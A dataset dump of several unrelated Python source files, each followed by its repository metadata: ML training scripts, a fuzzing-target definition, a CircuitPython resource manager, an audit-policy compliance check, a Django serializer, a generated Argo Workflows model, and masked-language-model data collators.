        cp = ModelCheckpoint(filepath, save_best_only=True, monitor = 'val_loss')
        model.fit(x_train,y_train,epochs = epochs, batch_size = bs, validation_data = (x_val,y_val),callbacks = [es,lr,cp])
    return
# 1. Data
train = pd.read_csv('c:/data/test/solar/train/train.csv')
sub = pd.read_csv('c:/data/test/solar/sample_submission.csv')
# Round-trip the data through .npy
data = train.values
print(data.shape)
np.save('c:/data/test/solar/train.npy', arr=data)
data =np.load('c:/data/test/solar/train.npy')
# Regroup the rows by hour-of-day using a transpose:
# (1095 days, 48 half-hours, 9 cols) -> (48, 1095, 9), so each hour slot's
# 1095 daily rows become contiguous.
data = data.reshape(1095, 48, 9)
data = np.transpose(data, axes=(1,0,2))
print(data.shape)
data = data.reshape(48*1095,9)
df = train.copy()
df.loc[:,:] = data
df.to_csv('c:/data/test/solar/train_trans.csv', index=False)
# Train a separate model per hour slot.
train_trans = pd.read_csv('c:/data/test/solar/train_trans.csv')
train_data = preprocess_data(train_trans) # (52560,7)
from tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint
es = EarlyStopping(monitor = 'val_loss', patience = 15)
lr = ReduceLROnPlateau(monitor = 'val_loss', patience = 5, factor = 0.5, verbose = 1)
# One pass per hour slot; only_compile() then loops over quantile and day,
# producing 48 * 9 * 2 checkpoints in total.
for i in range(48):
    # the 1095 daily rows belonging to hour slot i
    train_sort = train_data[1095*(i):1095*(i+1)]
    train_sort = np.array(train_sort)
    y = train_sort[7:,-1] #(1088,)
    from sklearn.preprocessing import StandardScaler
    scaler = StandardScaler()
    scaler.fit(train_sort)
    train_sort = scaler.transform(train_sort)
    # 7-day windows of scaled features
    x = split_x(train_sort, 7)
    x = x[:-2,:] #(1087,7,7)
    # y1 = next-day target (Day7), y2 = day-after target (Day8)
    y1 = y[:-1] #(1087,)
    y2 = y[1:] #(1087,)
    from sklearn.model_selection import train_test_split
    x_train, x_val, y1_train, y1_val, y2_train, y2_val = train_test_split(x, y1, y2, train_size=0.8, shuffle=True, random_state=32)
    epochs = 1000
    bs = 32
    only_compile(0, x_train, y1_train, x_val, y1_val)
    only_compile(1, x_train, y2_train, x_val, y2_val)
| [
"76455292+SunghoonSeok@users.noreply.github.com"
] | 76455292+SunghoonSeok@users.noreply.github.com |
d7c870c6c4ac1878e11b895e1762fa9c2276425c | 35567c513fcaff673433d24a8353193f2384435c | /src/wafp/targets/catalog/otto_parser/__init__.py | cea36b73513f5fcb30d0d6856288df295c3e9cb7 | [
"MIT"
] | permissive | schemathesis/web-api-fuzzing-project | 7d573c28b73e5b5ea2660fff3d79c5763b13d1a1 | 4f9d9614dafb06ea7d469a8fc9de230c1f152bdd | refs/heads/main | 2023-07-13T12:48:01.934609 | 2023-06-29T21:44:21 | 2023-06-29T21:44:21 | 354,606,912 | 12 | 1 | null | 2023-01-29T00:44:44 | 2021-04-04T17:35:40 | Python | UTF-8 | Python | false | false | 850 | py | from wafp.targets import (
BaseTarget,
Language,
Metadata,
Package,
SchemaSource,
SchemaSourceType,
Specification,
SpecificationType,
)
class Default(BaseTarget):
    """Fuzzing-target definition for the otto-parser service (Rust / tide)."""

    def get_base_url(self) -> str:
        """Root URL the fuzzer should talk to."""
        return "http://0.0.0.0:{port}/".format(port=self.port)

    def get_schema_location(self) -> str:
        """Path of the static OpenAPI schema shipped alongside the target."""
        return str(self.path / "schema.yaml")

    def is_ready(self, line: bytes) -> bool:
        """The service counts as up once its log announces the listening socket."""
        return line.find(b"Server listening on ") != -1

    def get_metadata(self) -> Metadata:
        """Static description of the implementation under test."""
        details = dict(
            language=Language.RUST,
            framework=Package(name="tide", version="0.14.0"),
            schema_source=SchemaSource(type=SchemaSourceType.STATIC, library=None),
            specification=Specification(name=SpecificationType.OPENAPI, version="3.0.3"),
            validation_from_schema=False,
        )
        return Metadata(**details)
| [
"dadygalo@gmail.com"
] | dadygalo@gmail.com |
b6f00ea9445cb2ed873ffc84fb662a6f421f60ba | 38cec74894f6d4296412f5c5c497ac2fd9574047 | /lib/timer/managed_resource.py | b4a4d0ae9912ce2ac3f18f5cc82611c645e6b5b5 | [] | no_license | jweaver85/neopixel-pico | bbc38afe8cf93d56432b184df9d965fa3c49808f | 11f2a17dba1718745db5038f54020d6539c982b5 | refs/heads/main | 2023-07-19T18:53:17.704179 | 2021-09-01T01:40:01 | 2021-09-01T01:40:01 | 370,134,083 | 0 | 0 | null | 2021-08-31T02:58:32 | 2021-05-23T18:55:51 | Python | UTF-8 | Python | false | false | 3,103 | py | import timer
class ManagedResource:
    """
    Manages a singleton resource with your functions that initialize a resource and clean it up between uses.
    This class vends access to `resource` via a fair (FIFO) queue. Intended use is with something like a busio.SPI
    with on_acquire setting a chip select pin and on_release resetting that pin.
    A ManagedResource instance should be shared among all users of `resource`.
    """
    def __init__(self, resource, on_acquire=lambda *args, **kwargs: None, on_release=lambda *args, **kwargs: None, loop=timer.get_loop()):
        """
        :param resource: The resource you want to manage access to (e.g., a busio.SPI)
        :param on_acquire: function(*args, **kwargs) => void acquires your singleton resource (CS pin low or something)
        :param on_release: function(*args, **kwargs) => void releases your singleton resource (CS pin high or something)
        :param loop: the timer event loop used to suspend/resume waiters.
            NOTE(review): timer.get_loop() is evaluated once, at class-definition
            time, so every instance defaults to the same loop object - presumably
            intentional (singleton loop), confirm against the timer library.
        """
        self._resource = resource
        self._on_acquire = on_acquire
        self._on_release = on_release
        self._loop = loop
        # FIFO of resume callbacks for coroutines waiting their turn
        self._ownership_queue = []
        # True while some handle is between __aenter__ and __aexit__
        self._owned = False
    def handle(self, *args, **kwargs):
        """
        Returns a reusable, reentrant handle to the managed resource.
        args and kwargs are passed to the on_acquire and on_release functions
        you provided with the resource.
        """
        return ManagedResource.Handle(self, args, kwargs)
    async def _aenter(self, args, kwargs):
        # Called by Handle.__aenter__; waits for ownership, then acquires.
        if self._owned:
            # queue up for access to the resource later
            await_handle, resume_fn = self._loop.suspend()
            self._ownership_queue.append(resume_fn)
            # This leverages the suspend() feature in timer; this current coroutine is not considered again until
            # the owning job is complete and __aexit__s below. This keeps waiting handles as cheap as possible.
            await await_handle
        self._owned = True
        self._on_acquire(*args, **kwargs)
        return self._resource
    async def _aexit(self, args, kwargs):
        # Called by Handle.__aexit__; releases and hands off to the next waiter.
        assert self._owned, 'Exited from a context where a managed resource was not owned'
        self._on_release(*args, **kwargs)
        if len(self._ownership_queue) > 0:
            # wake the longest-waiting coroutine (FIFO => fairness)
            resume_fn = self._ownership_queue.pop(0)
            # Note that the awaiter has already passed the ownership check.
            # By not resetting to unowned here we avoid unfair resource starvation in certain code constructs.
            resume_fn()
        else:
            self._owned = False
    class Handle:
        """
        Async context manager binding resource acquire/release args to a
        ManagedResource; reusable and safe to enter from multiple coroutines.
        """
        def __init__(self, managed_resource, args, kwargs):
            self._managed_resource = managed_resource
            self._args = args
            self._kwargs = kwargs
        async def __aenter__(self):
            # yields the underlying resource once ownership is granted
            return await self._managed_resource._aenter(self._args, self._kwargs)
        async def __aexit__(self, exc_type, exc_val, exc_tb):
            # releases even on exception; returns None so exceptions propagate
            return await self._managed_resource._aexit(self._args, self._kwargs)
| [
"justinweaver1985@gmail.com"
] | justinweaver1985@gmail.com |
f1c1d1272813db29b692fe04bc813b6a679526fc | 34599596e145555fde0d4264a1d222f951f49051 | /pcat2py/class/20dbcc2a-5cc5-11e4-af55-00155d01fe08.py | b39c4aee05264d664cba5c47aa38bafddd842eb2 | [
"MIT"
] | permissive | phnomcobra/PCAT2PY | dc2fcbee142ce442e53da08476bfe4e68619346d | 937c3b365cdc5ac69b78f59070be0a21bdb53db0 | refs/heads/master | 2021-01-11T02:23:30.669168 | 2018-02-13T17:04:03 | 2018-02-13T17:04:03 | 70,970,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 961 | py | #!/usr/bin/python
################################################################################
# 20dbcc2a-5cc5-11e4-af55-00155d01fe08
#
# Justin Dierking
# justindierking@hardbitsolutions.com
# phnomcobra@gmail.com
#
# 10/24/2014 Original Construction
################################################################################
class Finding:
    """Compliance check for the 'Special Logon' success-audit policy."""

    def __init__(self):
        # populated by check(); a fresh finding starts empty and non-compliant
        self.output = []
        self.is_compliant = False
        self.uuid = "20dbcc2a-5cc5-11e4-af55-00155d01fe08"

    def check(self, cli):
        """Query the audit policy via `cli` and record the result.

        Returns True when success auditing is enabled for 'Special Logon'.
        """
        self.is_compliant = False  # reset before probing
        enabled = cli.get_auditpol(r'Special Logon', 'Success')
        self.output = [r'Special Logon', 'Success=' + str(enabled)]
        self.is_compliant = bool(enabled)
        return self.is_compliant

    def fix(self, cli):
        """Enable success auditing for the 'Special Logon' subcategory."""
        cli.set_auditpol(r'Special Logon', 'Success', True)
| [
"phnomcobra@gmail.com"
] | phnomcobra@gmail.com |
2c13a2ad2330d2baa37a1eefedee78edf5ec460e | 837deb0044ec12b6f5261c6453f9909a5bbfbf25 | /api/accounts/serializers.py | 8ff407ad34d643d86f23eff12822c5cdac264a5d | [
"MIT"
] | permissive | yetiblue/testtemplate | 7de10c9e71713377adb0211c6728aa82a84567fe | 1fdc8a987710be89f53551934bf0539a8899b12a | refs/heads/master | 2023-07-11T23:36:03.636055 | 2020-07-29T16:51:25 | 2020-07-29T16:51:25 | 283,553,637 | 0 | 0 | MIT | 2023-06-21T23:09:45 | 2020-07-29T16:51:23 | Vue | UTF-8 | Python | false | false | 200 | py | from rest_framework import serializers
from accounts.models import User
class UserSerializer(serializers.ModelSerializer):
    """Serializes User model instances for the accounts API."""
    class Meta:
        # Expose every model field except the DB id and the password,
        # presumably to keep credentials out of API responses.
        exclude = ["id", "password"]
        model = User
| [
"thempver@gmail.com"
] | thempver@gmail.com |
068c3a2719668d0fbb119a48641c6c1176aefbd9 | 7b4cbaa1e7bab897e34acba06f73ac17760d394a | /sdks/python/client/argo_workflows/model/io_argoproj_workflow_v1alpha1_synchronization_status.py | 222415631e7bf3e8af75e91992c1a625ab626c3d | [
"Apache-2.0"
] | permissive | nHurD/argo | 0fab7f56179c848ad8a77a9f8981cb62b4a71d09 | f4a65b11a184f7429d0615a6fa65bc2cea4cc425 | refs/heads/master | 2023-01-13T04:39:54.793473 | 2022-12-18T04:48:37 | 2022-12-18T04:48:37 | 227,931,854 | 0 | 2 | Apache-2.0 | 2019-12-13T22:24:19 | 2019-12-13T22:24:18 | null | UTF-8 | Python | false | false | 12,163 | py | """
Argo Workflows API
Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. For more information, please see https://argoproj.github.io/argo-workflows/ # noqa: E501
The version of the OpenAPI document: VERSION
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from argo_workflows.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from argo_workflows.exceptions import ApiAttributeError
def lazy_import():
    # Generated OpenAPI-client helper: these model modules form an import
    # cycle with this one, so they are imported lazily and published through
    # globals() instead of at module load time. Do not hand-edit beyond comments.
    from argo_workflows.model.io_argoproj_workflow_v1alpha1_mutex_status import IoArgoprojWorkflowV1alpha1MutexStatus
    from argo_workflows.model.io_argoproj_workflow_v1alpha1_semaphore_status import IoArgoprojWorkflowV1alpha1SemaphoreStatus
    globals()['IoArgoprojWorkflowV1alpha1MutexStatus'] = IoArgoprojWorkflowV1alpha1MutexStatus
    globals()['IoArgoprojWorkflowV1alpha1SemaphoreStatus'] = IoArgoprojWorkflowV1alpha1SemaphoreStatus
class IoArgoprojWorkflowV1alpha1SynchronizationStatus(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'mutex': (IoArgoprojWorkflowV1alpha1MutexStatus,), # noqa: E501
'semaphore': (IoArgoprojWorkflowV1alpha1SemaphoreStatus,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'mutex': 'mutex', # noqa: E501
'semaphore': 'semaphore', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""IoArgoprojWorkflowV1alpha1SynchronizationStatus - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
mutex (IoArgoprojWorkflowV1alpha1MutexStatus): [optional] # noqa: E501
semaphore (IoArgoprojWorkflowV1alpha1SemaphoreStatus): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
    @convert_js_args_to_python_args
    def __init__(self, *args, **kwargs): # noqa: E501
        """IoArgoprojWorkflowV1alpha1SynchronizationStatus - a model defined in OpenAPI

        Keyword Args:
            _check_type (bool): if True, values for parameters in openapi_types
                                will be type checked and a TypeError will be
                                raised if the wrong type is input.
                                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                                drill down to the model in received_data
                                when deserializing a response
            _spec_property_naming (bool): True if the variable names in the input data
                                are serialized names, as specified in the OpenAPI document.
                                False if the variable names in the input data
                                are pythonic names, e.g. snake case (default)
            _configuration (Configuration): the instance to use when
                                deserializing a file_type parameter.
                                If passed, type conversion is attempted
                                If omitted no type conversion is done.
            _visited_composed_classes (tuple): This stores a tuple of
                                classes that we have traveled through so that
                                if we see that class again we will not use its
                                discriminator again.
                                When traveling through a discriminator, the
                                composed schema that is
                                is traveled through is added to this set.
                                For example if Animal has a discriminator
                                petType and we pass in "Dog", and the class Dog
                                allOf includes Animal, we move through Animal
                                once using the discriminator, and pick Dog.
                                Then in Dog, we will make an instance of the
                                Animal class but this time we won't travel
                                through its discriminator because we passed in
                                _visited_composed_classes = (Animal,)
            mutex (IoArgoprojWorkflowV1alpha1MutexStatus): [optional] # noqa: E501
            semaphore (IoArgoprojWorkflowV1alpha1SemaphoreStatus): [optional] # noqa: E501
        """
        # Pop the framework-internal kwargs first so the property loop below
        # only ever sees model properties.
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        # Generated models accept keyword arguments only.
        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        # Record this class so discriminator traversal does not revisit it.
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        # Assign remaining kwargs as model properties. Unknown keys are only
        # dropped when the configuration explicitly discards them AND the
        # model declares no additional-properties type.
        for var_name, var_value in kwargs.items():
            if var_name not in self.attribute_map and \
                    self._configuration is not None and \
                    self._configuration.discard_unknown_keys and \
                    self.additional_properties_type is None:
                # discard variable.
                continue
            setattr(self, var_name, var_value)
            # NOTE(review): this read-only check runs after setattr, so the
            # attribute is assigned before the error raises — confirm this
            # matches the intended generated-code behavior.
            if var_name in self.read_only_vars:
                raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
                                     f"class with read only attributes.")
| [
"noreply@github.com"
] | noreply@github.com |
b50a2e1ab089d707485cc42e0c38f5c1bf7429cd | 8c632cf57af066d2075b9d00fca352e3ad0b4e1d | /lesson 3/11 - CSV Exercise.py | bdc523022771836748ac681faaaf11ef8263a817 | [] | no_license | wesammustafa/Intro-to-Data-Science-Udacity | 65d779f2e969bf36c27f27169981b24cc8501a1f | 84ee375d0cc4b92e9c3c26368e8212bdbe1a3b89 | refs/heads/main | 2023-08-31T04:49:13.410727 | 2021-10-23T17:24:44 | 2021-10-23T17:24:44 | 412,406,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,227 | py | import pandas
def add_full_name(path_to_csv, path_to_new_csv):
    """Read a Lahman-style CSV and write a copy with a 'nameFull' column.

    The input CSV must contain 'nameFirst' and 'nameLast' columns; the new
    column joins them with a single space (e.g. 'Hank Aaron'). The augmented
    frame is written to path_to_new_csv.
    """
    frame = pandas.read_csv(path_to_csv)
    frame['nameFull'] = frame['nameFirst'] + ' ' + frame['nameLast']
    frame.to_csv(path_to_new_csv)
if __name__ == "__main__":
    # For local use only
    # If you are running this on your own machine add the path to the
    # Lahman baseball csv and a path for the new csv.
    # The dataset can be downloaded from this website: http://www.seanlahman.com/baseball-archive/statistics
    # We are using the file Master.csv
    # NOTE(review): with the placeholder empty paths below, running this
    # module directly will fail inside pandas.read_csv — fill both in first.
    path_to_csv = ""
    path_to_new_csv = ""
    add_full_name(path_to_csv, path_to_new_csv)
| [
"wesam.mustafa100@gmail.com"
] | wesam.mustafa100@gmail.com |
e0edbf38f52713fdf3fcb9f4d800149ab78a4add | e94408865d15b1afc0965a4d0525f124d2d2924c | /round1_code_backup/baseline_nezha_trained_weight/DataCollator.py | 21904335850a888462d4a88aee638dffd4853933 | [] | no_license | ngc7292/tianchi-oppo-matching | cc1d266a7faa3aa74fdfa492d6045a9671836c26 | 2d5f9a8759f3e96db36477501bce2ee0c49cf9da | refs/heads/master | 2023-05-09T00:42:36.143363 | 2021-05-11T06:46:25 | 2021-05-11T06:46:25 | 353,206,029 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,758 | py | # -*- coding: utf-8 -*-
"""
__title__="DataCollator"
__author__="ngc7293"
__mtime__="2021/3/17"
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple, Union
import torch
from transformers.tokenization_utils_base import BatchEncoding, PreTrainedTokenizerBase
from transformers import BertTokenizer
def _collate_batch(examples, tokenizer):
"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple)):
examples = [torch.tensor(e, dtype=torch.long) for e in examples]
# Check if padding is necessary.
length_of_first = examples[0].size(0)
are_tensors_same_length = all(x.size(0) == length_of_first for x in examples)
if are_tensors_same_length:
return torch.stack(examples, dim=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(x.size(0) for x in examples)
result = examples[0].new_full([len(examples), max_length], tokenizer.pad_token_id)
for i, example in enumerate(examples):
if tokenizer.padding_side == "right":
result[i, : example.shape[0]] = example
else:
result[i, -example.shape[0]:] = example
return result
@dataclass
class DataCollatorForLanguageModelingWithNgram:
    """
    Data collator used for language modeling. Inputs are dynamically padded to the maximum length of a batch if they
    are not all of the same length.
    Args:
        tokenizer (:class:`~transformers.PreTrainedTokenizer` or :class:`~transformers.PreTrainedTokenizerFast`):
            The tokenizer used for encoding the data.
        mlm (:obj:`bool`, `optional`, defaults to :obj:`True`):
            Whether or not to use masked language modeling. If set to :obj:`False`, the labels are the same as the
            inputs with the padding tokens ignored (by setting them to -100). Otherwise, the labels are -100 for
            non-masked tokens and the value to predict for the masked token.
        mlm_probability (:obj:`float`, `optional`, defaults to 0.15):
            The probability with which to (randomly) mask tokens in the input, when :obj:`mlm` is set to :obj:`True`.
        n_gram (:obj:`int`, `optional`, defaults to 3):
            When 3, every sampled mask position also spreads to its immediate left and right
            neighbours (see the NOTE inside :meth:`mask_tokens`).
    .. note::
        For best performance, this data collator should be used with a dataset having items that are dictionaries or
        BatchEncoding, with the :obj:`"special_tokens_mask"` key, as returned by a
        :class:`~transformers.PreTrainedTokenizer` or a :class:`~transformers.PreTrainedTokenizerFast` with the
        argument :obj:`return_special_tokens_mask=True`.
    """
    tokenizer: PreTrainedTokenizerBase
    mlm: bool = True
    mlm_probability: float = 0.15
    n_gram: int = 3
    def __post_init__(self):
        # MLM requires a [MASK] token; fail fast at construction time.
        if self.mlm and self.tokenizer.mask_token is None:
            raise ValueError(
                "This tokenizer does not have a mask token which is necessary for masked language modeling. "
                "You should pass `mlm=False` to train on causal language modeling instead."
            )
    def __call__(
        self, examples: List[Union[List[int], torch.Tensor, Dict[str, torch.Tensor]]]
    ) -> Dict[str, torch.Tensor]:
        """Pad/stack `examples` into a batch and attach labels under the "labels" key."""
        # Handle dict or lists with proper padding and conversion to tensor.
        if isinstance(examples[0], (dict, BatchEncoding)):
            batch = self.tokenizer.pad(examples, return_tensors="pt")
        else:
            batch = {"input_ids": _collate_batch(examples, self.tokenizer)}
        # If special token mask has been preprocessed, pop it from the dict.
        special_tokens_mask = batch.pop("special_tokens_mask", None)
        if self.mlm:
            batch["input_ids"], batch["labels"] = self.mask_tokens(
                batch["input_ids"], special_tokens_mask=special_tokens_mask
            )
        else:
            # Plain LM labels: copy of the inputs with padding ignored (-100).
            labels = batch["input_ids"].clone()
            if self.tokenizer.pad_token_id is not None:
                labels[labels == self.tokenizer.pad_token_id] = -100
            batch["labels"] = labels
        return batch
    def mask_tokens(
        self, inputs: torch.Tensor, special_tokens_mask: Optional[torch.Tensor] = None
    ) -> Tuple[torch.Tensor, torch.Tensor]:
        """
        Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.

        Note: `inputs` is modified in place and also returned.
        """
        labels = inputs.clone()
        # We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
        probability_matrix = torch.full(labels.shape, self.mlm_probability)
        if special_tokens_mask is None:
            special_tokens_mask = [
                self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
            ]
            special_tokens_mask = torch.tensor(special_tokens_mask, dtype=torch.bool)
        else:
            special_tokens_mask = special_tokens_mask.bool()
        # Never select special tokens ([CLS], [SEP], padding, ...) for masking.
        probability_matrix.masked_fill_(special_tokens_mask, value=0.0)
        masked_indices = torch.bernoulli(probability_matrix).bool()
        if self.n_gram == 3:
            # Spread each sampled position to its neighbours (trigram span).
            # NOTE(review): XOR (^) un-masks positions covered an even number
            # of times, and torch.roll wraps around the sequence ends so a
            # mask at one boundary leaks to the other — confirm both effects
            # are intended; a union (|) may have been meant here.
            masked_indices_left = torch.roll(masked_indices, -1, -1)
            masked_indices_right = torch.roll(masked_indices, 1, -1)
            masked_indices = masked_indices ^ masked_indices_left ^ masked_indices_right
        labels[~masked_indices] = -100 # We only compute loss on masked tokens
        # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
        indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
        inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
        # 10% of the time, we replace masked input tokens with random word
        indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
        random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
        inputs[indices_random] = random_words[indices_random]
        # The rest of the time (10% of the time) we keep the masked input tokens unchanged
        return inputs, labels
@dataclass
class DataCollatorForLanguageModelingWithNezha:
    """
    Data collator used for language modeling. Inputs are dynamically padded to the maximum length of a batch if they
    are not all of the same length.

    Identical to :class:`DataCollatorForLanguageModelingWithNgram` except that the labels are
    stored under the "masked_lm_labels" key (presumably the keyword argument name expected by
    the NeZha model's forward — verify against the model code).
    Args:
        tokenizer (:class:`~transformers.PreTrainedTokenizer` or :class:`~transformers.PreTrainedTokenizerFast`):
            The tokenizer used for encoding the data.
        mlm (:obj:`bool`, `optional`, defaults to :obj:`True`):
            Whether or not to use masked language modeling. If set to :obj:`False`, the labels are the same as the
            inputs with the padding tokens ignored (by setting them to -100). Otherwise, the labels are -100 for
            non-masked tokens and the value to predict for the masked token.
        mlm_probability (:obj:`float`, `optional`, defaults to 0.15):
            The probability with which to (randomly) mask tokens in the input, when :obj:`mlm` is set to :obj:`True`.
        n_gram (:obj:`int`, `optional`, defaults to 3):
            When 3, every sampled mask position also spreads to its immediate left and right neighbours.
    .. note::
        For best performance, this data collator should be used with a dataset having items that are dictionaries or
        BatchEncoding, with the :obj:`"special_tokens_mask"` key, as returned by a
        :class:`~transformers.PreTrainedTokenizer` or a :class:`~transformers.PreTrainedTokenizerFast` with the
        argument :obj:`return_special_tokens_mask=True`.
    """
    tokenizer: PreTrainedTokenizerBase
    mlm: bool = True
    mlm_probability: float = 0.15
    n_gram: int = 3
    def __post_init__(self):
        # MLM requires a [MASK] token; fail fast at construction time.
        if self.mlm and self.tokenizer.mask_token is None:
            raise ValueError(
                "This tokenizer does not have a mask token which is necessary for masked language modeling. "
                "You should pass `mlm=False` to train on causal language modeling instead."
            )
    def __call__(
        self, examples: List[Union[List[int], torch.Tensor, Dict[str, torch.Tensor]]]
    ) -> Dict[str, torch.Tensor]:
        """Pad/stack `examples` into a batch and attach labels under "masked_lm_labels"."""
        # Handle dict or lists with proper padding and conversion to tensor.
        if isinstance(examples[0], (dict, BatchEncoding)):
            batch = self.tokenizer.pad(examples, return_tensors="pt")
        else:
            batch = {"input_ids": _collate_batch(examples, self.tokenizer)}
        # If special token mask has been preprocessed, pop it from the dict.
        special_tokens_mask = batch.pop("special_tokens_mask", None)
        if self.mlm:
            batch["input_ids"], batch["masked_lm_labels"] = self.mask_tokens(
                batch["input_ids"], special_tokens_mask=special_tokens_mask
            )
        else:
            # Plain LM labels: copy of the inputs with padding ignored (-100).
            labels = batch["input_ids"].clone()
            if self.tokenizer.pad_token_id is not None:
                labels[labels == self.tokenizer.pad_token_id] = -100
            batch["masked_lm_labels"] = labels
        return batch
    def mask_tokens(
        self, inputs: torch.Tensor, special_tokens_mask: Optional[torch.Tensor] = None
    ) -> Tuple[torch.Tensor, torch.Tensor]:
        """
        Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.

        Note: `inputs` is modified in place and also returned.
        """
        labels = inputs.clone()
        # We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
        probability_matrix = torch.full(labels.shape, self.mlm_probability)
        if special_tokens_mask is None:
            special_tokens_mask = [
                self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
            ]
            special_tokens_mask = torch.tensor(special_tokens_mask, dtype=torch.bool)
        else:
            special_tokens_mask = special_tokens_mask.bool()
        # Never select special tokens ([CLS], [SEP], padding, ...) for masking.
        probability_matrix.masked_fill_(special_tokens_mask, value=0.0)
        masked_indices = torch.bernoulli(probability_matrix).bool()
        if self.n_gram == 3:
            # Spread each sampled position to its neighbours (trigram span).
            # NOTE(review): same XOR / roll wrap-around caveat as the Ngram
            # collator above — confirm the intended masking pattern.
            masked_indices_left = torch.roll(masked_indices, -1, -1)
            masked_indices_right = torch.roll(masked_indices, 1, -1)
            masked_indices = masked_indices ^ masked_indices_left ^ masked_indices_right
        labels[~masked_indices] = -100 # We only compute loss on masked tokens
        # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
